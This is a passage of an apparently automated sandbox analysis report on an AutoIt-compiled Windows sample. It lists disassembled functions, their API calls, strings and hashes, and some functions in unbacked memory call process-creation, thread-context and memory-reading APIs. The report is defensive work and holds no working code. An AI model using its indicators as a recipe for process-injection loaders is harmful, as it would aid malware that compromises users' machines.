Opcode ID: 615a27587bbb07de26543ae543ac43dcfb9f0781619c7b342562d257d4b1b3f1
Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
Opcode Fuzzy Hash: 615a27587bbb07de26543ae543ac43dcfb9f0781619c7b342562d257d4b1b3f1
Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
KillTimer.USER32(?,00000001), ref: 004036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
CreatePopupMenu.USER32 ref: 0040373E
PostQuitMessage.USER32(00000000), ref: 0040374D

Strings

TaskbarCreated, xrefs: 00403725
%I, xrefs: 0043D081, 0043D0CF

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%I
API String ID: 129472671-1195164674
Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403A50
LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
LoadIconW.USER32(00000063), ref: 00403A76
LoadIconW.USER32(000000A4), ref: 00403A88
LoadIconW.USER32(000000A2), ref: 00403A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
RegisterClassExW.USER32(?), ref: 00403B16

Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

0, xrefs: 00403AF4
AutoIt v3, xrefs: 00403B05
#, xrefs: 00403AFB

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88

Function 00B5CE90 Relevance: 16.2, APIs: 10, Instructions: 1202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 104e1d1edb5dcdb23bf887df6599fcfa50e1ac6333731a240aa6491aea537e6a
Instruction ID: 07e8ec32a39ab09ec316ba69b99ccd88376706c3ed6e25d21121d37113006561
Opcode Fuzzy Hash: 104e1d1edb5dcdb23bf887df6599fcfa50e1ac6333731a240aa6491aea537e6a
Instruction Fuzzy Hash: 5BA27F7150D3808FC735DB18C8547AABBE2EFD531AF094AD9E89897292D335AC0C8797

Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteScript, xrefs: 004038BC
/AutoIt3OutputDebug, xrefs: 00403892
CMDLINE, xrefs: 00403822
/ErrorStdOut, xrefs: 0040387D
CMDLINERAW, xrefs: 004037FB
/AutoIt3ExecuteLine, xrefs: 004038A7
RL, xrefs: 0043D213
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 004037AE

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
API String ID: 1825951767-3937808951
Opcode ID: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
Opcode Fuzzy Hash: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

Function 0040F76F Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1

Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
OleInitialize.OLE32(00000000), ref: 0040FA4A
CloseHandle.KERNEL32(00000000), ref: 004445C8

Strings

SL, xrefs: 0040F7EB
\TL, xrefs: 0040F7F7
%I, xrefs: 0040F796, 0040F7A8, 0040F96E, 0040FA51
@=, xrefs: 0040F7D7
<WL, xrefs: 0040F930

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <WL$@=$\TL$%I$SL
API String ID: 1986988660-2538527443
Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

Function 00DD8FE8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00DD90B9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DD92DF

Memory Dump Source

Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction ID: 6be58c9b330e2f5e1081a2857e217467a8aa6428125591dca5310cfa46041b7b
Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction Fuzzy Hash: 08A1E674E00209EBDB14CFA4C899BEEFBB5BF48304F24855AE515BB380D7769A41CB64

Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
ShowWindow.USER32(00000000,?,?), ref: 00403A38
ShowWindow.USER32(00000000,?,?), ref: 00403A41

Strings

edit, xrefs: 00403A1E
AutoIt v3, xrefs: 004039FB, 00403A00, 00403A01

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

Function 00DD8D58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 167
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DD8C48: Sleep.KERNEL32(000001F4), ref: 00DD8C59

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00DD8EDB

Strings

3B5INLL9FEF5OFGNBQ979BBMZX0, xrefs: 00DD8F44, 00DD8F47

Memory Dump Source

Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd

Similarity

API ID: CreateFileSleep
String ID: 3B5INLL9FEF5OFGNBQ979BBMZX0
API String ID: 2694422964-1250685158
Opcode ID: 189c3cf63f62623a7d1528ccd68a077505a0385397166f623cd91adf7227cc9f
Instruction ID: 992d0db9cc0097d46f4f630440f11c775e62a8d96de7e91b96bf8dcec4b267c0
Opcode Fuzzy Hash: 189c3cf63f62623a7d1528ccd68a077505a0385397166f623cd91adf7227cc9f
Instruction Fuzzy Hash: DB717470E14288DAEF11DBF4C8447EEBB75AF59304F044199E248BB2C1DBBA4A45C776

Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_memset.LIBCMT ref: 004040FC
_wcscpy.LIBCMT ref: 00404150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160

Strings

Line: , xrefs: 0043D400

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
Opcode Fuzzy Hash: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F

Function 00DD7C48 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00DD8403
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00DD8499
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00DD84BB

Memory Dump Source

Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
Instruction ID: 349988766a9c8c9477bd3f19b93d9b3f8960e553bc195812c6dcba454f7f931e
Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
Instruction Fuzzy Hash: AA62FD30A14258DBEB24CFA4C851BDEB376EF58300F1091A9D10DEB394EB759E81DB69

Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042547B
_memcpy_s.LIBCMT ref: 004254ED
__read_nolock.LIBCMT ref: 0042554B
__filbuf.LIBCMT ref: 0042556E
_memset.LIBCMT ref: 004255B2

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49

Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F

_free.LIBCMT ref: 0043E263
_free.LIBCMT ref: 0043E2AA

Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0043E039
Bad directive syntax error, xrefs: 0043E292

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 76b22fcdb104576b8204d1ff80a4dd9579291db2c87d7f16e113a35b5536db53
Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
Opcode Fuzzy Hash: 76b22fcdb104576b8204d1ff80a4dd9579291db2c87d7f16e113a35b5536db53
Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59

Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617

Strings

Control Panel\Mouse, xrefs: 004035D2

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768

Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD

Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837

_free.LIBCMT ref: 004696A2
_free.LIBCMT ref: 004696A9
_free.LIBCMT ref: 00469714

Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B

_free.LIBCMT ref: 0046971C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59

Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004247A0
__flush.LIBCMT ref: 004247C0
__write.LIBCMT ref: 004247F3
__flsbuf.LIBCMT ref: 00424821

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48

Function 00B5B180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00B5B2BA
WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00B5B2E0

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 77587c797ec236fc36632d525777df04de4964db5fdd58029de59e0fb332c4f9
Instruction ID: 4c295b49ff85a7478e2e5e7bfd44a70a3014fbb12fa914077f8c6f438552b18d
Opcode Fuzzy Hash: 77587c797ec236fc36632d525777df04de4964db5fdd58029de59e0fb332c4f9
